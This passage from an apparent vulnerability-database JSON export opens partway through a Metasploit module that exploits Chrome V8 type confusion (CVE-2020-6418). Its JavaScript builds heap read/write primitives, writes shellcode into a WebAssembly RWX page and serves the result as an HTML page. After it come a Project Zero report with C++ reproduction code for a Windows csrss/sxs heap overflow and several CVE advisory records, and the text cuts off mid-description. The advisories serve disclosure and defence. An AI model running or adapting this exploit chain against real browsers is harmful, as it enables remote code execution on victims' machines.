\nfloat_rel = [0.2, 1.2, 2.2, 3.2, 4.3]; \nfloat_carw = [6.6]; \nuint64_aarw = new BigUint64Array(4); \nobj_leaker = { \na: float_rel, \nb: float_rel, \n}; \n \nreturn Object.prototype; \n} \n}); \n \nfunction main(o) { \nfor (var i = 0; i < 0x10000; ++i) {}; \nreturn f(o); \n} \n \n// reads 4 bytes from the compressed heap at the specified dword offset after float_rel \nfunction crel_read4(offset) { \nvar qw_offset = Math.floor(offset / 2); \nif (offset & 1 == 1) { \nreturn float_rel[qw_offset].fhw(); \n} else { \nreturn float_rel[qw_offset].flw(); \n} \n} \n \n// writes the specified 4-byte BigInt value to the compressed heap at the specified offset after float_rel \nfunction crel_write4(offset, val) { \nvar qw_offset = Math.floor(offset / 2); \n// we are writing an 8-byte double under the hood \n// read out the other half and keep its value \nif (offset & 1 == 1) { \ntemp = float_rel[qw_offset].flw(); \nnew_val = (val << 32n | temp).i2f(); \nfloat_rel[qw_offset] = new_val; \n} else { \ntemp = float_rel[qw_offset].fhw(); \nnew_val = (temp << 32n | val).i2f(); \nfloat_rel[qw_offset] = new_val; \n} \n} \n \nconst float_carw_elements_offset = 0x14; \n \nfunction cabs_read4(caddr) { \nelements_addr = caddr - 8n | 1n; \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_read4: ' + hex(float_carw[0].f2i())); \nres = float_carw[0].flw(); \n// TODO restore elements ptr \nreturn res; \n} \n \n \n// This function provides arbitrary within read the compressed heap \nfunction cabs_read8(caddr) { \nelements_addr = caddr - 8n | 1n; \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_read8: ' + hex(float_carw[0].f2i())); \nres = float_carw[0].f2i(); \n// TODO restore elements ptr \nreturn res; \n} \n \n// This function provides arbitrary write within the compressed heap \nfunction cabs_write4(caddr, val) { \nelements_addr = caddr - 8n | 1n; \n \ntemp = cabs_read4(caddr + 4n | 1n); \nprint('cabs_write4 temp: '+ hex(temp)); \n \nnew_val = (temp << 32n | val).i2f(); \n \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_write4 prev_val: '+ hex(float_carw[0].f2i())); \n \nfloat_carw[0] = new_val; \n// TODO restore elements ptr \nreturn res; \n} \n \nconst objleaker_offset = 0x41; \nfunction addrof(o) { \nobj_leaker.b = o; \naddr = crel_read4(objleaker_offset) & BigInt(2**32-2); \nobj_leaker.b = {}; \nreturn addr; \n} \n \nconst uint64_externalptr_offset = 0x1b; // in 8-bytes \n \n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array \nfunction read8(addr) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nval = uint64_aarw[0]; \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \nreturn val; \n} \n \n// Arbitrary write. We corrupt the backing store of the `uint64_aarw` array and then write into the array \nfunction write8(addr, val) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nuint64_aarw[0] = val; \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \nreturn val; \n} \n \n// Given an array of bigints, this will write all the elements to the address provided as argument \nfunction writeShellcode(addr, sc) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset - 1] = 10; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nfor (var i = 0; i < sc.length; ++i) { \nuint64_aarw[i] = sc[i] \n} \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \n} \n \n \nfunction get_compressed_rw() { \n \nfor (var i = 0; i < 0x10000; ++i) {empty();} \n \nmain(empty); \nmain(empty); \n \n// Function would be jit compiled now. \nmain(p); \n \nprint(`Corrupted length of float_rel array = ${float_rel.length}`); \n} \n \nfunction get_arw() { \nget_compressed_rw(); \nprint('should be 0x2: ' + hex(crel_read4(0x15))); \nlet previous_elements = crel_read4(0x14); \n//print(hex(previous_elements)); \n//print(hex(cabs_read4(previous_elements))); \n//print(hex(cabs_read4(previous_elements + 4n))); \ncabs_write4(previous_elements, 0x66554433n); \n//print(hex(cabs_read4(previous_elements))); \n//print(hex(cabs_read4(previous_elements + 4n))); \n \nprint('addrof(float_rel): ' + hex(addrof(float_rel))); \nuint64_aarw[0] = 0x4142434445464748n; \n} \n \nfunction rce() { \nfunction get_wasm_func() { \nvar importObject = { \nimports: { imported_func: arg => print(arg) } \n}; \nbc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb]; \nwasm_code = new Uint8Array(bc); \nwasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject); \nreturn wasm_mod.exports.exported_func; \n} \n \nlet wasm_func = get_wasm_func(); \n// traverse the JSFunction object chain to find the RWX WebAssembly code page \nlet wasm_func_addr = addrof(wasm_func); \nlet sfi = cabs_read4(wasm_func_addr + 12n) - 1n; \nprint('sfi: ' + hex(sfi)); \nlet WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n; \nprint('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData)); \n \nlet instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n; \nprint('instance: ' + hex(instance)); \n \nlet wasm_rwx_addr = cabs_read8(instance + 0x68n); \nprint('wasm_rwx_addr: ' + hex(wasm_rwx_addr)); \n \n// write the shellcode to the RWX page \nwhile(shellcode.length % 4 != 0){ \nshellcode += \"\\u9090\"; \n} \n \nlet sc = []; \n \n// convert the shellcode to BigInt \nfor (let i = 0; i < shellcode.length; i += 4) { \nsc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000)); \n} \n \nwriteShellcode(wasm_rwx_addr,sc); \n \nprint('success'); \nwasm_func(); \n} \n \n \nfunction exp() { \nget_arw(); \nrce(); \n} \n \nexp(); \n^ \n \nif datastore['DEBUG_EXPLOIT'] \ndebugjs = %Q^ \nprint = function(arg) { \nvar request = new XMLHttpRequest(); \nrequest.open(\"POST\", \"/print\", false); \nrequest.send(\"\" + arg); \n}; \n^ \njscript = \"#{debugjs}#{jscript}\" \nelse \njscript.gsub!(/\\/\\/.*$/, '') # strip comments \njscript.gsub!(/^\\s*print\\s*\$.*?\$;\\s*$/, '') # strip print(*); \nend \n \nhtml = %Q^ \n<html> \n<head> \n<script> \n#{jscript} \n</script> \n</head> \n<body> \n</body> \n</html> \n^ \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156632/chrome_jscreate_sideeffect.rb.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-12T17:03:13", "description": "", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-12T00:00:00", "type": "packetstorm", "title": "Windows sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity Heap Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027", "CVE-2022-22026"], "modified": "2022-08-12T00:00:00", "id": "PACKETSTORM:168068", "href": "https://packetstormsecurity.com/files/168068/Windows-sxs-CNodeFactory-XMLParser_Element_doc_assembly_assemblyIdentity-Heap-Buffer-Overflow.html", "sourceData": "`Windows: Heap buffer overflow in sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity \n \n## SUMMARY \nA heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges. \n \n \n## VULNERABILITY DETAILS \nIn 2020, Project Zero reported a heap buffer overflow in application manifest parsing[1]. The `MaximumLength` field in one of the `UNICODE_STRING` parameters of the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine wasn't properly validated, and was later used by `XMLParser_Element_doc_assembly_assemblyIdentity` as the maximum size of a `memcpy` destination buffer. The fix added an extra `CsrValidateMessageBuffer` call to `BaseSrvSxsCreateActivationContextFromMessage`. \n \nWe've just discovered that `BaseSrvSxsCreateActivationContextFromMessage` is not the only CSR routine that can reach `XMLParser_Element_doc_assembly_assemblyIdentity`. An attacker can trigger the same buffer overflow via `BaseSrvSxsCreateProcess`. \n \n1. https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2020/CVE-2020-1027.html \n \n \n## VERSION \nWindows 11 12H2 (OS Build 22000.593) \nWindows 10 12H2 (OS Build 19044.1586) \n \n \n## REPRODUCTION CASE \n1) Enable page heap verification for csrss.exe: \n``` \ngflags /p /enable csrss.exe /full \n``` \n \n2) Restart the machine. \n \n3) Compile and run: \n``` \n#pragma comment(lib, \"ntdll\") \n \n#include <windows.h> \n#include <winternl.h> \n#include <cstdint> \n#include <cstdio> \n#include <string> \n \ntypedef struct _SECTION_IMAGE_INFORMATION { \nPVOID EntryPoint; \nULONG StackZeroBits; \nULONG StackReserved; \nULONG StackCommit; \nULONG ImageSubsystem; \nWORD SubSystemVersionLow; \nWORD SubSystemVersionHigh; \nULONG Unknown1; \nULONG ImageCharacteristics; \nULONG ImageMachineType; \nULONG Unknown2[3]; \n} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; \n \ntypedef struct _RTL_USER_PROCESS_INFORMATION { \nULONG Size; \nHANDLE ProcessHandle; \nHANDLE ThreadHandle; \nCLIENT_ID ClientId; \nSECTION_IMAGE_INFORMATION ImageInformation; \nBYTE Unknown1[128]; \n} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION; \n \nNTSTATUS(NTAPI* RtlCreateProcessParameters) \n(PRTL_USER_PROCESS_PARAMETERS*, \nPUNICODE_STRING, \nPUNICODE_STRING, \nPUNICODE_STRING, \nPUNICODE_STRING, \nPVOID, \nPUNICODE_STRING, \nPUNICODE_STRING, \nPUNICODE_STRING, \nPUNICODE_STRING); \nNTSTATUS(NTAPI* RtlCreateUserProcess) \n(PUNICODE_STRING, \nULONG, \nPRTL_USER_PROCESS_PARAMETERS, \nPSECURITY_DESCRIPTOR, \nPSECURITY_DESCRIPTOR, \nHANDLE, \nBOOLEAN, \nHANDLE, \nHANDLE, \nPRTL_USER_PROCESS_INFORMATION); \n \nPVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG); \nVOID(NTAPI* CsrFreeCaptureBuffer)(PVOID); \nNTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG); \nNTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR); \n \nvoid CaptureString(LPVOID capture_buffer, \nuint8_t* msg_field, \nPCWSTR string, \nsize_t length = 0) { \nif (length == 0) \nlength = lstrlenW(string); \n \nCsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2, \nlength * 2 + 2, (PSTR)msg_field); \n} \n \nint main() { \nHMODULE ntdll = LoadLibrary(L\"ntdll\"); \n \n#define INIT_PROC(name) \\ \nname = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name)); \n \nINIT_PROC(RtlCreateProcessParameters); \nINIT_PROC(RtlCreateUserProcess); \n \nINIT_PROC(CsrAllocateCaptureBuffer); \nINIT_PROC(CsrFreeCaptureBuffer); \nINIT_PROC(CsrClientCallServer); \nINIT_PROC(CsrCaptureMessageString); \n \nUNICODE_STRING image_path; \nPRTL_USER_PROCESS_PARAMETERS proc_params; \nRTL_USER_PROCESS_INFORMATION proc_info = {0}; \n \nRtlInitUnicodeString(&image_path, L\"\\\\SystemRoot\\\\notepad.exe\"); \nRtlCreateProcessParameters(&proc_params, &image_path, NULL, NULL, NULL, NULL, \nNULL, NULL, NULL, NULL); \nRtlCreateUserProcess(&image_path, OBJ_CASE_INSENSITIVE, proc_params, NULL, \nNULL, NULL, FALSE, NULL, NULL, &proc_info); \n \nconst size_t HEADER_SIZE = 0x40; \nuint8_t msg[HEADER_SIZE + 0x1f8] = {0}; \n \n#define FIELD(n) msg + HEADER_SIZE + 8 * n \n#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value; \n \nSET_FIELD(2, proc_info.ClientId.UniqueProcess); \nSET_FIELD(3, proc_info.ClientId.UniqueThread); \n \nSET_FIELD(4, -1); \nSET_FIELD(7, 1); \nSET_FIELD(8, 0x20000); \n \nstd::string manifest = \n\"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' \" \n\"manifestVersion='1.0'>\" \n\"<assemblyIdentity name='@' version='1.0.0.0'/>\" \n\"</assembly>\"; \nmanifest.replace(manifest.find('@'), 1, 0x4000, 'A'); \n \nSET_FIELD(13, manifest.c_str()); \nSET_FIELD(14, manifest.size()); \n \nPVOID capture_buffer = CsrAllocateCaptureBuffer(6, 0x200); \n \nCaptureString(capture_buffer, FIELD(22), L\"C:\\\\Windows\\\\\"); \nCaptureString(capture_buffer, FIELD(24), L\"\\x00\\x00\", 2); \nCaptureString(capture_buffer, FIELD(28), L\"A\"); \nSET_FIELD(28, 0xff000002); \n \nCsrClientCallServer(msg, capture_buffer, 0x1001001d, \nsizeof(msg) - HEADER_SIZE); \n} \n``` \n \nThe crash should look like to the following: \n``` \nCONTEXT: 0000007c4afbcfc0 -- (.cxr 0x7c4afbcfc0) \nrax=0000020e6515ce00 rbx=0000000000004000 rcx=0000020e6515d010 \nrdx=fffffffffbe741fa rsi=0000020e652c48c0 rdi=0000000000000001 \nrip=00007ff825a53c53 rsp=0000007c4afbdd38 rbp=0000007c4afbde80 \nr8=0000000000000032 r9=00000000000001f7 r10=00007ff822e6b558 \nr11=0000020e60fd8ffc r12=0000020e66d1cf80 r13=0000000000000001 \nr14=0000000000000000 r15=0000000000000005 \niopl=0 nv up ei pl nz na pe nc \ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 \nntdll!memcpy+0x113: \n0033:00007ff8`25a53c53 0f2941f0 movaps xmmword ptr [rcx-10h],xmm0 ds:002b:0000020e`6515d000=???????????????????????????????? \nResetting default scope \n \nWRITE_ADDRESS: 0000020e6515d000 \n \nEXCEPTION_RECORD: 0000007c4afbd4b0 -- (.exr 0x7c4afbd4b0) \nExceptionAddress: 00007ff825a53c53 (ntdll!memcpy+0x0000000000000113) \nExceptionCode: c0000005 (Access violation) \nExceptionFlags: 00000000 \nNumberParameters: 2 \nParameter[0]: 0000000000000001 \nParameter[1]: 0000020e6515d000 \nAttempt to write to address 0000020e6515d000 \n \nSTACK_TEXT: \n0000007c`4afbdd38 00007ff8`22df5a41 : 0000020e`652c48c0 00000000`00000001 00000000`00000001 00000000`00000001 : ntdll!memcpy+0x113 \n0000007c`4afbdd40 00007ff8`22e07b94 : 00007ff8`00000000 00000000`000000a8 0000020e`652c48c0 0000020e`652c48c0 : sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity+0x4c1 \n0000007c`4afbe3c0 00007ff8`22e1f406 : 0000020e`652e7f20 0000020e`652e7f20 00000000`00000000 00000000`00000000 : sxs!CNodeFactory::CreateNode+0xd34 \n0000007c`4afbe7d0 00007ff8`22df8a33 : 0000020e`00000000 0000020e`652a8cc8 00000000`00000000 0000020e`65166e20 : sxs!XMLParser::Run+0x8d6 \n0000007c`4afbe8f0 00007ff8`22df7468 : 0000020e`00000000 0000020e`6527ac90 00000000`00000000 0000020e`6527ac90 : sxs!SxspIncorporateAssembly+0x513 \n0000007c`4afbeab0 00007ff8`22df7cf6 : 00000000`00000000 00000000`00000000 0000020e`6527ac90 0000020e`65167720 : sxs!SxspIncorporateAssembly+0x104 \n0000007c`4afbeb60 00007ff8`22df3769 : 0000007c`00000000 0000007c`4afbefa0 00000000`00000000 0000020e`65166e20 : sxs!SxspCloseManifestGraph+0xbe \n0000007c`4afbec00 00007ff8`22fb3eed : 00000000`00000000 00000000`00000000 00000000`00000000 0000007c`4afbf3a0 : sxs!SxsGenerateActivationContext+0x339 \n0000007c`4afbed60 00007ff8`22fb2405 : 0000007c`4afbf1f0 000004f7`0000000b 00000000`00000000 00000000`00000001 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x6ed \n0000007c`4afbf1a0 00007ff8`22fb1e91 : 0000020e`56e00000 00000000`01080002 00000000`00000264 00000000`00000270 : sxssrv!InternalSxsCreateProcess+0x545 \n0000007c`4afbf680 00007ff8`230133c3 : 00000000`00000000 0000007c`4afbf789 00000000`00000000 00000000`00000000 : sxssrv!BaseSrvSxsCreateProcess+0x71 \n0000007c`4afbf6c0 00007ff8`23036490 : 0000020e`ffffffff 0000007c`4afbf848 0000020e`00000000 0000020e`00000001 : basesrv!BaseSrvCreateProcess2+0x1f3 \n0000007c`4afbf7f0 00007ff8`25a0265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d0 \n0000007c`4afbfe90 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f \n``` \n \n \n## CREDIT INFORMATION \nSergei Glazunov of Google Project Zero \n \n \nRelated CVE Numbers: CVE-2020-1027,CVE-2022-22026,CVE-2022-22026. \n \n \n \nFound by: glazunov@google.com \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/168068/GS20220812145103.txt"}], "redhatcve": [{"lastseen": "2023-02-01T08:14:11", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-26T07:44:08", "type": "redhatcve", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2023-02-01T05:37:35", "id": "RH:CVE-2020-6418", "href": "https://access.redhat.com/security/cve/cve-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-02-03T13:51:08", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | The Debian chromium source package is called chromium-browser in Ubuntu\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T00:00:00", "type": "ubuntucve", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-02-27T00:00:00", "id": "UB:CVE-2020-6418", "href": "https://ubuntu.com/security/CVE-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2022-10-26T18:28:10", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.\n\nFor all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.\n\nThe update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T07:00:00", "type": "mscve", "title": "Adobe Font Manager Library Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938"], "modified": "2020-04-14T07:00:00", "id": "MS:CVE-2020-0938", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0938", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n\nTo exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.\n\nThe security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-14T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027"], "modified": "2020-04-14T07:00:00", "id": "MS:CVE-2020-1027", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1027", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-27T00:23:13", "description": "Microsoft has become aware of limited targeted Windows 7 based attacks that could leverage un-patched vulnerabilities in the Adobe Type Manager Library, and is providing the following guidance to help reduce customer risk until the security update is released. We appreciate the efforts of our industry partners and are complying with a 7-day timeline for disclosing information regarding these limited attacks.\n\nTwo remote code execution vulnerabilities exist in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.\n\nMicrosoft is aware of this vulnerability and working on a fix. Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month. This predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers. The operating system versions that are affected by this vulnerability are listed below. Please see the mitigation and workarounds for guidance on how to reduce the risk.\n\n**Please Note:** The threat is low for those systems running Windows 10 due to mitigations that were put in place with the first version released in 2015.\n\nPlease see the mitigation section for details. Microsoft is not aware of any attacks against the Windows 10 platform. The possibility of remote code execution is negligible and elevation of privilege is not possible. We do not recommend that IT administrators running Windows 10 implement the workarounds described below.\n\nMicrosoft recommends upgrading to the Windows 10 family of clients and servers.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-23T07:00:00", "type": "mscve", "title": "Type 1 Font Parsing Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2020-04-14T07:00:00", "id": "MS:ADV200006", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV200006", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:10", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - 